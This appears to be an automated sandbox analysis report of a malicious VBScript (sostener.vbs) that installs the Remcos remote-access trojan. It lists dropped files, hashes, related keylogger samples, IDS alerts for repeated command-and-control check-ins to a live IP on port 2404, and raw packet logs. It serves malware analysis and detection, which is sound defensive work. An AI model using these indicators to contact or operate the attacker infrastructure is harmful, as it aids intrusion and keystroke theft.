                                      g7HXGuuY6X.elfGet hashmaliciousMiraiBrowse
                                      • 170.80.8.38

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      • 207.241.227.240
                                      CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      • 207.241.227.240
                                      RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.97.3
                                      • 207.241.227.240
                                      RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                      • 188.114.97.3
                                      • 207.241.227.240
                                      QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 188.114.97.3
                                      • 207.241.227.240
                                      450230549.exeGet hashmaliciousAgentTeslaBrowse
                                      • 188.114.97.3
                                      • 207.241.227.240
                                      450230549.exeGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      • 207.241.227.240
                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      • 207.241.227.240
                                      https://geminiqwc-sw.top/Get hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      • 207.241.227.240
                                      http://tiktok1688.cc/Get hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      • 207.241.227.240

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\ProgramData\remcos\registros.dat

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):144
                                      Entropy (8bit):3.379519383183141
                                      Encrypted:false
                                      SSDEEP:3:rhlKlRlrPlDopCl55JWRal2Jl+7R0DAlBG45klovDl6v:6lnl55YcIeeDAlOWAv
                                      MD5:A3279C240C39B56C1A9C84CC8DAB9544
                                      SHA1:95B418A4BD1DF4D5A3DDDDB540626E8E17605718
                                      SHA-256:82E2AB4E01C396B6B72484BB183B2234B002953AC899F42343EE79480B5802FE
                                      SHA-512:8AE106E4D532C86A456CB7CF599F50AA01473BBEDEBD1E3DD99574B37ED11C6542FCE9C82290DC034526C9F8D8AF6CFCDA3D1E5FB1C4F4CB9268117042D96EC1
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\registros.dat, Author: Joe Security
                                      Reputation:low
                                      Preview:....[.2.0.2.4./.0.9./.2.6. .0.4.:.5.8.:.0.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1940658735648508
                                      Encrypted:false
                                      SSDEEP:3:Nlllul55bl/Z:NllU
                                      MD5:D3B86703AAED73DD3EC0A467E8E94A75
                                      SHA1:0F4F7B2D253B1E5317E0523C584323EFE648AFCC
                                      SHA-256:B3FA547E57A764C37C994F3A72929E499C8AAEDA177BDBACD9E7F3C8A34348E1
                                      SHA-512:D358B7BAFDC693B4B7BA03638A67A5D27F3C3C3C222DDC015A0BCA3383510AF3AAB54D088EC6BF995580C3EA3B68AC78A11AE4360486886BA4DAEB2C631FA941
                                      Malicious:false
                                      Reputation:low
                                      Preview:@...e................................................@..........

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0tywwnyo.0ep.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2mbirvsr.mjx.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e0sszj1e.el2.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfyjcqr2.gsg.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      Static File Info

                                      General

                                      File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Entropy (8bit):3.7378045422779724
                                      TrID:
                                      • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                      • MP3 audio (1001/1) 32.22%
                                      • Lumena CEL bitmap (63/63) 2.03%
                                      • Corel Photo Paint (41/41) 1.32%
                                      File name:sostener.vbs
                                      File size:511'254 bytes
                                      MD5:3b4164bdb4cf6c49570c95714f8c17a5
                                      SHA1:13c7abef0333088056a8c11c951c97fcb878ad96
                                      SHA256:fac857a7fa291be79831caef11498e067c036cd66812c7f1244b95b3e78a3ea4
                                      SHA512:460bf20b6d30b4314703b67356828e540db80b43e3afc37ce2d075660370a4a306659075abe4a6895039df86316d95756441e40546d8d72daef7c5c11e7155ac
                                      SSDEEP:12288:n9D/msDMDwwpZcKHg9NR4A6sgmkhf1dM4Y6ebu5Z2PqoKuN8HUe5FXNbSEKOsyTE:Sbqj
                                      TLSH:FEB41A1135EAB008F1F22FA356FD55E94FABB5662A36912E7048074F4B93E80CE51B73
                                      File Content Preview:..........i.W.W.G.i.A.f.d.i.i.J.i.L.u.O.m.R.g.h.m.B.o.m.W.k.Q.G.T.U.K.g.r.G.m.U.a.C.J.d.L.G.K.k.m.l.I.a.s.N.d.f.U.e.L.m.h.K.k.d.O.c.q.L.W.z.p.m.i. .=. .".p.U.q.G.Z.B.b.N.K.K.L.S.i.k.c.q.S.L.W.A.O.L.d.K.f.L.A.L.K.S.W.P.L.p.f.N.A.l.e.j.K.W.B.o.U.n.u.L.i.P.m

                                      File Icon

                                      Icon Hash:68d69b8f86ab9a86

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-09-26T10:58:07.123709+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.649712188.114.97.3443TCP
                                      2024-09-26T10:58:07.298698+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11188.114.97.3443192.168.2.649712TCP
                                      2024-09-26T10:58:07.298698+02002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11188.114.97.3443192.168.2.649712TCP
                                      2024-09-26T10:58:09.556119+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649713181.236.206.32404TCP
                                      2024-09-26T10:58:12.269130+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649715181.236.206.32404TCP
                                      2024-09-26T10:58:14.960707+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649716181.236.206.32404TCP
                                      2024-09-26T10:58:17.587794+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649720181.236.206.32404TCP
                                      2024-09-26T10:58:20.242842+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649722181.236.206.32404TCP
                                      2024-09-26T10:58:22.913558+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649724181.236.206.32404TCP
                                      2024-09-26T10:58:25.555536+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649725181.236.206.32404TCP
                                      2024-09-26T10:58:28.210996+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649726181.236.206.32404TCP
                                      2024-09-26T10:58:30.882978+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649727181.236.206.32404TCP
                                      2024-09-26T10:58:33.508255+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649728181.236.206.32404TCP
                                      2024-09-26T10:58:36.133301+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649729181.236.206.32404TCP
                                      2024-09-26T10:58:38.805103+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649730181.236.206.32404TCP
                                      2024-09-26T10:58:41.449621+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649732181.236.206.32404TCP
                                      2024-09-26T10:58:44.056777+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652102181.236.206.32404TCP
                                      2024-09-26T10:58:46.695749+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652103181.236.206.32404TCP
                                      2024-09-26T10:58:49.321937+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652104181.236.206.32404TCP
                                      2024-09-26T10:58:51.977856+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652105181.236.206.32404TCP
                                      2024-09-26T10:58:54.639365+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652106181.236.206.32404TCP
                                      2024-09-26T10:58:57.289503+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652107181.236.206.32404TCP
                                      2024-09-26T10:58:59.931275+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652108181.236.206.32404TCP
                                      2024-09-26T10:59:02.575895+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652109181.236.206.32404TCP
                                      2024-09-26T10:59:05.211109+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652111181.236.206.32404TCP
                                      2024-09-26T10:59:07.851896+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652112181.236.206.32404TCP
                                      2024-09-26T10:59:20.958757+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652113181.236.206.32404TCP
                                      2024-09-26T10:59:23.572392+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652114181.236.206.32404TCP
                                      2024-09-26T10:59:26.214181+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652115181.236.206.32404TCP
                                      2024-09-26T10:59:28.854186+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652116181.236.206.32404TCP
                                      2024-09-26T10:59:31.526186+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652117181.236.206.32404TCP
                                      2024-09-26T10:59:34.132700+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652119181.236.206.32404TCP
                                      2024-09-26T10:59:36.773249+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652120181.236.206.32404TCP
                                      2024-09-26T10:59:39.460610+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652121181.236.206.32404TCP
                                      2024-09-26T10:59:42.104552+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652122181.236.206.32404TCP
                                      2024-09-26T10:59:44.711300+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652123181.236.206.32404TCP
                                      2024-09-26T10:59:47.322623+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652124181.236.206.32404TCP
                                      2024-09-26T10:59:49.853288+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652125181.236.206.32404TCP
                                      2024-09-26T10:59:52.402234+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652126181.236.206.32404TCP
                                      2024-09-26T10:59:54.930365+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652127181.236.206.32404TCP
                                      2024-09-26T10:59:57.386279+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652128181.236.206.32404TCP
                                      2024-09-26T10:59:59.806269+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652129181.236.206.32404TCP
                                      2024-09-26T11:00:02.198263+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652130181.236.206.32404TCP
                                      2024-09-26T11:00:04.601059+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652131181.236.206.32404TCP
                                      2024-09-26T11:00:06.976502+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.652132181.236.206.32404TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 26, 2024 10:58:03.343214989 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:03.343291044 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:03.343401909 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:03.353288889 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:03.353363991 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:03.954437017 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:03.954545021 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:03.957101107 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:03.957117081 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:03.957484007 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:03.967825890 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.011415958 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.238998890 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.239031076 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.239049911 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.239136934 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.239168882 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.239209890 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.260369062 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.260396957 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.260488033 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.260497093 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.261785984 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.306307077 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.306334019 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.306449890 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.306459904 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.309789896 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.346894979 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.346930027 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.346983910 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.347003937 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.347023964 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.347038984 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.348114014 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.348134995 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.348212004 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.348212004 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.348218918 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.348505974 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.350023031 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.350044012 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.350080013 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.350085020 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.350112915 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.350127935 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.439459085 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.439481020 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.439584017 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.439591885 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.439615965 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.439632893 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.460016966 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.460041046 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.460097075 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.460103035 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.460143089 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.461210012 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.461230040 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.461271048 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.461276054 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.461291075 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.461306095 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.462202072 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.462225914 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.462260962 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.462265015 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.462294102 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.482245922 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.482319117 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.482367992 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.482435942 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.482479095 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.482683897 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.507016897 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.507051945 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.507123947 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.507143974 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.507172108 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.507190943 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.527105093 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.527132034 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.527199984 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.527241945 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.527278900 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.527453899 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.547595978 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.547641993 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.547677994 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.547703981 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.547750950 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.548391104 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.548434019 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.548460960 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.548471928 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.548491001 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.548508883 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.549253941 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.549313068 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.549340963 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.549350977 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.549370050 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.549391031 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.549688101 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.549735069 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.549762964 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.549771070 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.549794912 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.549813032 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.550648928 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.550688982 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.550720930 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.550731897 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.550745964 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.550765991 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.569791079 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.569839001 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.569890022 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.569958925 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.569992065 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.570048094 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.595243931 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.595318079 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.595365047 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.595436096 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.595482111 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.595482111 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.614495039 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.614535093 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.614597082 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.614626884 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.614648104 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.614670038 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.634911060 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.634957075 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635009050 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635046959 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635076046 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635189056 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635379076 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635422945 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635446072 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635457039 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635509014 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635530949 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635828972 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635860920 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635902882 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635912895 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.635931969 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.635942936 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.636399984 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.636432886 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.636472940 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.636482000 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.636504889 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.636518955 CEST49711443192.168.2.6207.241.227.240
                                      Sep 26, 2024 10:58:04.639600039 CEST44349711207.241.227.240192.168.2.6
                                      Sep 26, 2024 10:58:04.639636993 CEST44349711207.241.227.240192.168.2.6
